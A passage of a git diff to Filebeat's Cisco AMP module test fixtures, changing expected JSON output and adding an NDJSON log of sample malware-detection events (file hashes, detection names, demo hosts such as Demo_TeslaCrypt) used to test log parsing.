"b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Upatre", + "host.name": 
"Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 314451, + "log.offset": 57972, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Upatre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -6070,60 +2397,66 @@ ] }, { - "@timestamp": "2021-01-15T10:09:30.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 292000000, + "cisco.amp.timestamp_nanoseconds": 672000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256988482109000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
"host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 315770, + "log.offset": 59570, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6131,7 +2464,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:29.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6142,8 +2475,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6152,14 +2485,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 782000000, + "cisco.amp.timestamp_nanoseconds": 653000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666703518204000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -6173,7 +2506,7 @@ "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 317089, + "log.offset": 60896, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6196,7 +2529,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:27.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6207,25 +2540,24 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666694928269316", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 80000000, + "cisco.amp.timestamp_nanoseconds": 260000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666694928269000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -6233,20 +2565,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 319725, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 2204, + "log.offset": 62215, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6269,7 +2594,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:24.000Z", + "@timestamp": "2021-01-15T10:17:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6281,7 +2606,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.detection_id": "6176259135965757532", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6290,14 +2615,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 286000000, + "cisco.amp.timestamp_nanoseconds": 8000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256962712306000, + "event.id": 6176259135965757000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, 
@@ -6310,7 +2635,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 321307, + "log.offset": 63534, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", 
@@ -6330,72 +2655,55 @@ ] }, { - "@timestamp": "2021-01-15T10:09:07.000Z", + "@timestamp": "2021-01-15T10:17:41.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617250006073346", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 296000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617250006073000, + "event.id": 1489955900291000600, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "tdss.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": 
"Demo_TeslaCrypt", "input.type": "log", - "log.offset": 322626, - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "explorer.exe", - "process.pid": 1892, + "log.offset": 64851, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "4a052246c5551e83d2d55f80e72f03eb", - "bc29f1e8460915596e1dcafd0c92d6309457d149" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_TDSS" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -6403,80 +2711,64 @@ ] }, { - "@timestamp": "2021-01-15T10:09:02.000Z", + "@timestamp": "2021-01-15T10:17:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "5a:ff:4a:a3:8a:2f" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "DFC.CustomIPList", - "cisco.amp.detection_id": "5826709511729053698", - "cisco.amp.event_type_id": 1090519084, + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251516445163601", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], - "cisco.amp.network_info.nfm.direction": "Outgoing connection from", - "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "5a:ff:4a:a3:8a:2f" + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 613000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 706000000, - "destination.as.number": 15169, - "destination.as.organization.name": "Google LLC", - "destination.geo.continent_name": "North America", - "destination.geo.country_iso_code": "US", - "destination.geo.country_name": "United States", - "destination.geo.location.lat": 37.751, - "destination.geo.location.lon": -97.822, - "destination.ip": "8.8.4.4", - "destination.port": 80, - "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 5826709511729054000, + "event.id": 6159251516445164000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": 
"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", "fileset.name": "amp", - "host.hostname": "Demo_Tinba", - "host.name": "Demo_Tinba", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 324228, - "network.direction": "egress", - "network.transport": "TCP", - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "Explorer.EXE", - "process.pid": 1600, + "log.offset": 66143, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], "related.hosts": [ - "Demo_Tinba" + "Demo_TeslaCrypt" ], "related.ip": [ - "10.10.0.0", - "8.8.4.4", "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", - "source.ip": "10.10.0.0", - "source.port": 1083, "tags": [ "cisco-amp", "forwarded" - ], - "url.domain": "dak1otavola1ndos.com", - "url.extension": "php", - "url.original": "http://dak1otavola1ndos.com/h/index.php", - "url.path": "/h/index.php", - "url.scheme": "http" + ] } ] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log new file mode 100644 index 000000000000..4a0581fcd4d6 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log 
@@ -0,0 +1,45 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251512150196256","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":381000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":365000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196254","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":350000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196253","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":318000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":303000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":287000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":256000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196247","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} 